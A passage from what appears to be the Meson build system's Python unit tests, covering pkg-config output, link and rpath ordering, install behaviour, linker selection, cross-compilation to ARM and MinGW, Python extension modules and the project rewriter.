self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.src_root, 'test cases', 'native', '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, etc, so this test is skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not (is_osx() or is_linux()):
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
if not is_osx():
# Rest of the workflow only works on macOS
return
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
@skipIfNoPkgconfig
def test_usage_pkgconfig_prefixes(self):
'''
Build and install two external libraries, to different prefixes,
then build and install a client program that finds them via pkgconfig,
and verify the installed client program runs.
'''
oldinstalldir = self.installdir
# Build and install both external libraries without DESTDIR
val1dir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'val1')
val1prefix = os.path.join(oldinstalldir, 'val1')
self.prefix = val1prefix
self.installdir = val1prefix
self.init(val1dir)
self.build()
self.install(use_destdir=False)
self.new_builddir()
env1 = {}
env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig')
val2dir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'val2')
val2prefix = os.path.join(oldinstalldir, 'val2')
self.prefix = val2prefix
self.installdir = val2prefix
self.init(val2dir, override_envvars=env1)
self.build()
self.install(use_destdir=False)
self.new_builddir()
# Build, install, and run the client program
env2 = {}
env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig')
testdir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'client')
testprefix = os.path.join(oldinstalldir, 'client')
self.prefix = testprefix
self.installdir = testprefix
self.init(testdir, override_envvars=env2)
self.build()
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'client')
env3 = {}
if is_cygwin():
env3['PATH'] = os.path.join(val1prefix, 'bin') + \
os.pathsep + \
os.path.join(val2prefix, 'bin') + \
os.pathsep + os.environ['PATH']
out = self._run([prog], override_envvars=env3).strip()
# Expected output is val1 + val2 = 3
self.assertEqual(out, '3')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
linker = cc.linker
if not linker.export_dynamic_args(env):
raise unittest.SkipTest('Not applicable for linkers without --export-dynamic')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'build_wrapper.py')))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '74 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def test_no_rpath_for_static(self):
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertIsNone(build_rpath)
def test_lookup_system_after_broken_fallback(self):
# Just to generate libfoo.pc so we can test system dependency lookup.
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir = self.privatedir
# Write test project where the first dependency() returns not-found
# because 'broken' subproject does not exit, but that should not prevent
# the 2nd dependency() to lookup on system.
self.new_builddir()
with tempfile.TemporaryDirectory() as d:
with open(os.path.join(d, 'meson.build'), 'w') as f:
f.write(textwrap.dedent('''\
project('test')
dependency('notfound', fallback: 'broken', required: false)
dependency('libfoo', fallback: 'broken', required: true)
'''))
self.init(d, override_envvars={'PKG_CONFIG_LIBDIR': privatedir})
def test_as_link_whole(self):
testdir = os.path.join(self.unit_test_dir, '79 as link whole')
self.init(testdir)
with open(os.path.join(self.privatedir, 'bar1.pc')) as f:
content = f.read()
self.assertIn('-lfoo', content)
with open(os.path.join(self.privatedir, 'bar2.pc')) as f:
content = f.read()
self.assertNotIn('-lfoo', content)
class BaseLinuxCrossTests(BasePlatformTests):
# Don't pass --libdir when cross-compiling. We have tests that
# check whether meson auto-detects it correctly.
libdir = None
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_cross_libdir_subproject(self):
# Guard against a regression where calling "subproject"
# would reset the value of libdir to its default value.
testdir = os.path.join(self.unit_test_dir, '78 subdir libdir')
self.init(testdir, extra_args=['--libdir=fuf'])
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'fuf')
return
self.assertTrue(False, 'Libdir specified on command line gets reset.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name, (python2 / python3) the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_tatrget_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
